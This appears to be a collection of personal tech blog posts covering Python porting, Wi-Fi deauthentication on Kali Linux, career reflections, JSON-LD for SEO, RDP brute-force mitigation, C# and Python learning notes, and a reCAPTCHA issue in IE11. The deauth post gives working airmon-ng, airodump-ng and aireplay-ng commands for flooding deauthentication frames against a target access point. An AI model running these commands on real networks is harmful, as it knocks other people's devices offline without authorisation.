Porting My Python 3 Scraper Script Over to my Kali Linux VM

This is republished from my old Blogger blog but I can’t find the original Python script blog article. I’ll be back soon to post the content for the original article if I’ve kept good enough notes. Argh!

I didn’t know what else to call the title but this is what I’m doing…

I wrote a Python scraper script, see my previous blog posts on how to do this yourselves.

So I’m a little further down the road in my training and want to take that script written on my Windows PC using Python 3 and run it on a Kali Linux VM which apparently is running Python 2.7.

So as with all things tech, it won’t run without some tweaking.

This is how I got it to work.

First, there is a difference in how you execute Python scripts in Linux. With Kali Linux, you seem to have several versions installed by default. Looks like python 2.7 is the directory where most of the goodies including the BeautifulSoup package my scraper needs were so I’m using this one.

Example of how to call python2.7 then pass the script that is located in the “Desktop” folder to it.

The only code I had to update one line of  code and that was the reference to the urllib.

Why? Because the urllib and urllib2 packages have been split into urllib.request , urllib.parse and urllib.error packages in Python 3.x. The latter packages do not exist in Python 2.x

We are going backwards in version and

Old code: from urllib.request import urlopen as uReq

New code: from urllib2 import urlopen as uReq

Kali Linux: Wi-Fi Deauth Attack

What is a “Deauth Attack”?

This article on deauthentication (Deauth) attacks on Hackernoon is a good a starting point.

https://hackernoon.com/forcing-a-device-to-disconnect-from-wifi-using-a-deauthentication-attack-f664b9940142

A Wi-Fi deauthentication attack is a Denial of Service (DOS) attack done over Wi-Fi by flooding the air with deauthorization frames while spoofing the Wi-Fi SSID of your target wireless network.

This attack results in interruption in service for wireless devices by forcing them to disconnect from the target network.

As the device tries to reconnect, we continue to send deauth packets. Even if device does connect briefly, we eventually intercept one of the packets and device will disconnect.

If the attacker is relentless, your only option is to change your SSID but they can just pick it up again and repeat the process.

Kali Linux Commands You Might Need

#Tail command: tail redirects output from a file to the screen

#Use tail command to read in a file and display it on the screen

Example: tail -f -n 0 /var/log/messages

#-n is number of lines (default is 10), so -n 0 is a live feed of text.

#-f is “follow” option. output appended data as the file grows

#Get more help with tail by typing man tail.

#Network Config

ifconfig

#Wireless Config

Iwconfig

iwconfig eth0 freq 2422000000
                   iwconfig eth0 freq 2.422G
                   iwconfig eth0 channel 3
                   iwconfig eth0 channel auto

Pasted from <http://www.linuxcommand.org/man_pages/iwconfig8.html>

Note: Setting the county code on wireless card – Do this before modifying the transmit power. For my USB wireless card has to have the country set before it would let me change the transmit power

#Setting the transmit power using the iw command. iw is used to manipulate wireless properties.

iwconfig [interface]

#Example: iwconfig wlan0 txpower 25

iw

#Airmon Wireless Monitor

Use airmon-ng to set up a monitor

  • airmon-ng start [interface]
  • Example: airmon-ng start wlan0

#Run the command below if you are having problems with other processes when trying to run airmon-ng

  • Example: airmon-ng check kill

#Airodump Wireless Network Monitor

Use Airodump to monitor wireless networks.

Starting airodump

  • airodump-ng [interface] /
  • Example: airodump-ng wlan0mon
  • Example: airodump-ng wlan0mon (Dump out the Monitor mon data from previous step)

Press Ctrl + c to stop airodump-ng

The result is a monitor on wlan0 which shows as interface wlan0mon

#In the example below, the -0 represents “Type of Attack” = Deauthentication

#In the example below the 220 represents the amount of time to send deauthentication messages

#followed by the MAC Address and the Inteface that Airmon is listening on.

aireplay-ng -0 220 [MAC Address] [interface]

Example: aireplay-ng -0 220 -a A0:63:91:A6:84:36 wlan0mon

A Career in IT: Get Used to Saying Goodbye

It’s Saturday night and I’m reflecting on a conversation I had with a good friend, mentor and former teammate last night about staying motivated and embracing change in an IT career. Especially, later in your career.

I told him to get used to saying goodbye to things and people. This includes letting go of things like projects, systems, roles and code bases as your career progresses in a large enterprise or similar organization.

My friend and I are both Navy veterans and have worked at the same civilian employer for quite a while. Our employer when we started was much smaller than the huge enterprise it has grown into.

We joke about it, but it is probably true that our teams have been reorganized at least 6 times in the last 10 years. That is a lot of churn and change inside an operation.

As result of all that churn, there had been a lot of anxiety about everyone’s roles but on the flip-side there were also lots of opportunities to move around.

I’ve held at least 7 titles in the last 16 years. I’ve not stayed in a role more than three years. Luckily, all my moves have been up and for the last couple of roles, I was recruited. I’m at the end of one big thing and by January most likely moving to new project or roles. The future is still bright.

My friend on the other hand, stayed where he was on the engineering team that I had left for my current role but his teams have changed a few times due to reorganizations but essentially doing the same job for many years but maybe feeling rudderless and unfulfilled.

These are the two perspectives that are the background for the rest of this article.

Over time, if you don’t feel challenged, grow professionally or have many “wins” under your belt, your not going to feel very good about what your’re doing and lack of motivation will set in.

My advice was to fight that lack of motivation and approach every project, meeting or networking opportunity with a positive outlook or else you just might miss that one connection or event that changes your life or career for the better.

Change is scary and apprehension breads resistance to change. Sometimes, we resist change simply because its uncomfortable. As a result, we miss out on new opportunities to improve ourselves or make career connections that will lead your to your next gig or boss resulting in a better and more fulfilled life.

Is a lack of self-confidence to blame? That one requires some self reflection to answer. However, sometimes that same fear of the unknown or comfortableness causes people to cling to old roles, systems and code bases because they can become comfortable places to rest in the chaos.

We can get burned out in IT, I’ve hit burnout several times. Its OK to rest and take a break now and then, but you gotta keep pushing yourself to get a little better everyday and keep an eye out for opportunities to grow yourself and make a difference in the world with your IT skills.

If you want any chance of feeling fulfilled by what you’re doing in your job / career. You have to find something that drives you at your core and find a way to tie it to what you do every day so you have a driving force and compass to guide you. The rest will become autopilot.

If you can’t do that, time to do something else. Life’s too damn short not to.

-Regards,
Rick

This Week in SEO w/ Rick Cable for Week Ending 10/25/2019

There is a lot going in SEO this week.

Barry Schwartz over at Searh Engine Roundtable is discussing a Google search engine algorithm update on Wednesday, October 24th

On my site, FinditClassifieds.com, I did see a slight increase in organic traffic from Google after the 10/24/2019 update initially. I had new JSON-LD code I’ll be discussing later in the article that was generating a HTTP 500 sever errors which caused Google to pause displaying pages from the domain for both organic search results as well Google Ads (CPC) at the exact same time. Hopefully, this is only temporary and our organic search results momentum can be picked up where we left off.

This suggests that both the Organic Search Results side and Paid Advertising CPC Google Ads seem to use the Googlebot HTTP 500 server error results as a flag for a domain and or sub-domains and reduce traffic to them.

I looked around and found this information packed article that includes information on how Google Search uses Googlebot 500 error results to remove problem pages or domains as soon as issues are detected.

MY FIRST JSON-LD IMPLEMENTATION W/ LESSONS LEARNED

A Background Video on JSON-LD

You would implement JSON-LD to make sure Googlebot in this case can pick up on product details such as the product name, description and price. JSON-LD helps provides context to information Googlebot spiders on your site.

My implementation of JSON-LD was done on the local classifieds page. This JSON-LD example was a list of items for sale in a classified ads page for the Modesto, California metro area.

JSON-LD Code Example / Server Side Code Generates the Script Block

The system I’m patching to add the JSON-LD is running on Classic ASP which is probably closer to PHP or C# Razor Syntax. The language and or framework matter not that much, its the idea / solution.

This example is mix of front end JavaScript and ASP VBScript taking care of the looping thru the recordset to get the values needed to fill in the JSON-LD values.

To me, JSON is a fairly simple concept of transporting data in a simple key/value pair format.

The trickiest part I found about constructing a well structured and acceptable JSON-LD message is the nesting syntax when outputting multiple records at a time and and making sure that we don’t have duplicate values in the key/value pairs.

In my case, I had to construct the JSON-LD block inside a server side code block where we are looping through a recordset and outputting the fields related to the JSON-LD from the local classifieds ad table.

Notice how I’ve got @context and @type outside the loop as these fields and values will be the same for each record. 

So output all your values that are the same for every record then nest the rest of the output in a block inside it using [ ] and { } as seen in the example below. Feel free to checkout the output from the live site anytime. :-).

http://modesto.finditclassifieds.com/misc-classifieds/local-search.asp

<script type="application/ld+json">
	"@context" : "http://schema.org",
	"@type" : "Product" [
<% While NOT Recordset1.eof	%>
<% if InStr(Recordset1("Category"),"service") = 0 then %>
		{
	"@name" : "<%=Replace(Mid(Recordset1("ItemDescription"),1,40),vbCrLf,"") & " in " & Recordset1("City") & ", " & Recordset1("State")%>",
	"decription" : "<%=Replace(Replace(Mid(Recordset1("AdText"),1,120), vbCrLf, ""),vbTab,"")%>",
	"offers" : {
		"@type": Offer,
		"url": "<%=SiteURL%>/misc-classifieds/listings-detail/adid/<%=Recordset1("ID")%>/description/<%=Server.URLEncode(Replace(Mid(Recordset1("ItemDescription"),1,25),vbCrLf,""))%>",
		"priceCurrency": "USD"
		}
	}
		
	],
	<% 
	end if
	Recordset1.MoveNext
	Wend
	Recordset1.MoveFirst 
	%>
</script>

SEO Videos & Articles of Note for Week Ending 10/25/2019.

Here are the best SEO related videos and articles I could find to share with you this week!

Marie Haynes Search News Podcast – Oct 23rd 2019

Video: SEO This Week Episode 139 – Coding, Links, Mapping

Video: SEO Fight Club Episode 38 – Rank Tracking Problems

Video: Barry Schwartz Interview w/ Eric Enge of Stone Temple Consulting in Boston

3 Low Cost Ideas to Address RDP Brute Force Attacks on Your Windows Web Server

Its late at night, I’m remoted in to my Windows web server. I’m reviewing the event logs and see something suspicious. Audit failures in the Security event logs.

The next 7 hours had me consumed in learning everything I can about “Brute Force RDP Attacks” and try to apply it to my server ASAP.

Before I go any further, I want to reiterate that this a hobby server I run. This is not a server I work on for my day job in a large enterprise environment. Hence the focus on low cost solutions.

First, Remote Desktop Protocol (RDP), is probably one of the most commonly unsecured items on Windows web servers which is also why your server is going to be relentlessly pounded by scanning tools and hackers trying to access your server via RDP, usually via port 3389.

Video: Brute Force Attack with Hydra Hacking Tool

I could just block port 3389 and move on with my life but I personally prefer to access this particular server via RDP to handle administrative tasks. Everything else is done via FTP or telnet.

I run all my hobby servers on a super tight budget. This article will discuss what I learned and how I applied that knowledge to mitigate some of the risk associated with managing Windows servers exposed to the Wild Wild West (WWW) with RDP connections using techniques that are no cost except for your time to implement.

Low Cost Ideas for Mitigating RDP Brute Force Attacks on Your Windows Servers

  1. Use Strong Passwords
    • Strong passwords are your first and best defense for any RDP brute force attack.
      • Use a password with a length or 12 character or more.
      • Don’t use words that can be found in a dictionary
      • Use a combination of UPPER CASE, lower case, numbers and special characters
      • Be Social Media aware! Don’t use friends, family, pets or info that could be derived from Social Media posts.
  2. Clean Up Old User Accounts
    • Make sure only the accounts you need are on your server.
    • Fewer accounts reduces possible attack vectors.
    • Also validate the level of access of the accounts on your server.
  3. Update Windows Firewall Rules
    • Exclude IP Ranges for Countries with highest amount of hacking.
    • See steps below for updating your Windows Firewall configuration to block IP ranges for China, Russia and North Korea.

Before You Mess with Your Firewall

The PowerShell script I cover below worked great but then decided to build a firewall rule manually for South American IP addresses and re-learned a very important lesson about working with Firewalls.

A word of caution: Don’t build your Firewall IP restrictions manually.

Always script them out in PowerShell. If you’re not 100% awake and paying attention, you will find yourself blocked out of your server and kicking yourself in the ass like I did.

Thankfully, I have a great hosting company, AccuWebHosting, who has been able to un-do all my screw ups so far. I’ve used them happily for many years and highly recommend them. I pay about $500 a year for a decent Windows server VPS with great support.

Use Windows Firewall to Block IP Ranges for China, Russia and North Korea and many others.

The steps to block IP ranges using Windows Firewall are pretty simple.

  1. Create a directory for working with PowerShell and PowerShell Scripts.
    • Example: C:\ip-security
  2. Go to this page click on Step 2 link to download your PowerShell scripts zip file.
  3. Extract contents of the the ip-security-package.zip file to your “C:\ip-security” folder.
    • You folder should look like this:
  4. Open PowerShell from the Command Line as an Administrator so you’ll have the correct rights to make changes to the Windows Firewall
  5. Run this command to make sure PowerShell is in the right mode
    • “Set-ExecutionPolicy Bypass”
    • Type “Y” when prompted to access the change
  6. Type the following commands to import the IP Range Exclusions in to Windows Firewall.
    • Import-Firewall-Blocklist.ps1 -inputfile china.zone.txt
    • Import-Firewall-Blocklist.ps1 -inputfile russia.zone.txt
    • Import-Firewall-Blocklist.ps1 -inputfile northkorea.txt
  7. You should now have IP blocks in your firewall.

If you’ve done these three things, your web server is better prepared than most.

Some Closing Thoughts on Web Server Security

Security on the internet is hard and ever changing. Running your own server for your hobby or side hustle can be done but can be very frustrating and overwhelming at times. Do as much of what I covered as you can.

We covered a few options above, but if you get nothing else from this article, make sure your passwords are long and hard to guess as this is the last defense before a bad guy gets access to your system.

From meetings I’ve been in with Enterprise engineers, passwords of 12 characters or more are best. Rainbow hash attacks can typically get most common passwords less than 12 characters. Scary, right?

Don’t use passwords made from words that can be found in a dictionary and now with the new world of social media, avoid using your kids, significant other or pet’s name or other references that can be guessed from online posts.

In one of the attacks that prompted me to write this article, one attacker used my youngest Son’s full name. I don’t use Facebook anymore so there only a few places you could go to figure that out.

I hope this story helps someone else on their IT Journey.

Regards,
Rick Cable
Lost in the Cyber Abyss

References:

https://www.gregsitservices.com/blog/2016/02/blocking-unwanted-countries-with-windows-firewall/

http://www.ipdeny.com/ipblocks/

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-6

C# Generics: Digesting Tim Corey’s C# Generics Video

C# Generics: Digesting Tim Corey’s C# Generics Video

Tonight, I’m completing a learning session on C# Generics. I’m using Tim Corey’s YouTube video on C# Generics as my tutorial.

You can get all the files to go along with Tim Corey’s C# Generics video at Time’s web site for the cost of providing Tim with your email address for his email list. You can unsubscribe anytime.

Below is Corey’s Video. Watch it, then if you’re still interested. My personal training notes will be shared below. It might help you if you’re feeling stuck or want to cement an idea in your own mind.

Tim Corey’s C# Generics Video

How to Get Started Programming in Python / Python Crash Course

Crash Course in to Python Programming

I had really been wanting to find a couple of hours to do a crash course on python and finally found an opportunity to do it last night.

Having been a programmer for a while, I’m finding many of the Python videos quite boring as they are for absolute beginners which has you plodding through the basics of programming which makes learning a new programming language painfully slow.

Luckily, I had found this great Python primer video by Derek Banas on YouTube.

I followed along and completed all the code in the video and had working examples of most of the important code snippets for much of how stuff gets done in Python.  Success was not without some pain, see problems and  resolutions below.

Video: Learn Python in One Video

I will save you some pain by telling you there is a very frustrating code issue at the end of this long video.

See code fix below.

When you are in the Dog class referencing the Animal super class from which it inherits the name, weight, height and sound, properties or values you have to use the setter and getter class methods instead of the object “self” reference like we could in the Animal object.  Once you change that, the code works.

For the Dog class, the toString() method only worked for me the example below:

def toString(self):
        return "{} is {} cm tall and {} kilograms, says {} and owner is {}".format(
                                                                    self.get_name(),
                                                                    self.get_height(),
                                                                    self.get_weight(),
                                                                    self.get_sound(),
                                                                    self.__owner)
...instead of:
(this doesn't)
def toString(self):
        return "{} is {} cm tall and {} kilograms, says {} and owner is {}".format(
                                                                    self.__name,
                                                                    self.__height,
                                                                    self.__weight,
                                                                    self.__sound,
                                                                    self.__owner)

As a bonus I would add watching this video to help solidify the idea of polymorphism if you’re having difficulty getting a grasp of it.

Hope this helps someone!

Video: What is Polymorphism?

Rick’s Picks: Top 5 Software Developer Podcasts

About 3 years ago I took on a challenging role as a developer at a start-up that had me doing a 3-4 hour daily commute, 5 days a week.

I’m working from home a lot more now but I did this grueling commute for at least 2 years. I still commute now, just less frequently. I learned to fill my time with lots of technical information mainly podcasts.

It took a while to nail it down, but felt I got the most out of filling my drive time with software development podcasts when I made my self research virtually every unfamiliar term or concept I would hear on the podcasts. Initially, it was exhausting but slowly over time, I was looking things up less and less and impostor syndrome visited less and less. 🙂

Here is a list of the top 5 software development podcasts that I found helpful in my journey as a web / software developer.

Have a favorite developer podcast you didn’t see on my list? Drop me a line or leave a comment with your favorite.

Callback Functions in Javascript – Explained!

I’m working on a project and the topic of Javascript callback functions came up. I’m sure I’ve come upon this before in the past but never spent a lot of time on thinking deeply about it.

I’ve seen a lot of video and blogs about Javascript callback functions but most say it is hard to explain.

I’ve just spent 2 hours digging in and here is the easiest way I can explain them to anyone.

A Javascript callback function is just a placeholder that we can use when we want to be able to pass a function in to another function, then it acts as the function itself once we inject it in to the other function where we can substitute callback “in our minds” with the name of the function we passed in the code logic.

I will be back soon to elaborate and provide you with examples.

-Regards Rick

Here are some good references I’m looking at now.
http://recurial.com/programming/understanding-callback-functions-in-javascript/

Video:

Google reCAPTCHA Privacy and Terms of Service links not Working in Internet Explorer 11 (Explained)

I’m sharing this story as it is something you might encounter when using Internet Explorer 11 with Google’s CAPTCHA service (code). 

This came up in UAT testing recently for a web product I work on so I thought I would share.  It might save you some time explaining to your customers about cross browser compatibility testing.

First off, Google has a free service for trying to detect bots on your site called “CAPTCHA”. CAPTCHA is an acronym for “Completely Automated Public Turing Test to tell Computer and Humans Apart”.

Google’s free CAPTCHA service called reCAPTCHA requires developers to register your website to get an API key which you will use along with some code to call the API from your site.  Pretty cool stuff, right?

I’m really simplifying this but to render the reCAPTCHA you would insert their code snippet. Make sure the code is loading from a a page using the HTTPS protocol or else it might not work.

<html>
  <head>
    <title>reCAPTCHA demo: Simple page</title>
     <script src="https://www.google.com/recaptcha/api.js" async defer></script>
  </head>
  <body>
    <form action="?" method="POST">
      <div class="g-recaptcha" data-sitekey="your_site_key"></div>
      <br/>
      <input type="submit" value="Submit">
    </form>
  </body>
</html>

Once the reCAPTCHA is loading on the page, it will be loading its contents in an IFRAME. This is really important to our story!

There are links in the Google CAPTCHA that point to a privacy page and terms of service page on the Google.com domain which both have a “target =_blank” attribute on the link. This means these links should open in new windows or tab depending on other pressed keys.

The links are working just fine in Chrome and Firefox and opening in new windows but not IE 11.

What is the issue here?

It could have been earlier than IE 11 but, Microsoft implemented a security feature to restrict links loading in IFRAMES from linking out to a domain other than the one it originally loaded from.

The CAPTCHA code is loading from your WhatEverDomain.com but all the links in the IFRAME are pointing to the Google.com domain are now all disabled.

References:

https://github.com/google/recaptcha/issues/191

https://answers.microsoft.com/en-us/ie/forum/ie11-iewindows_10/links-that-open-in-new-browser-tabs-dont-work-on/55e7b147-bb66-4b4a-b88d-3533166a059a

Here is a video on how to install Google reCAPTCHA for your website. Good luck and happy coding!

Video: Google reCapthca 2.0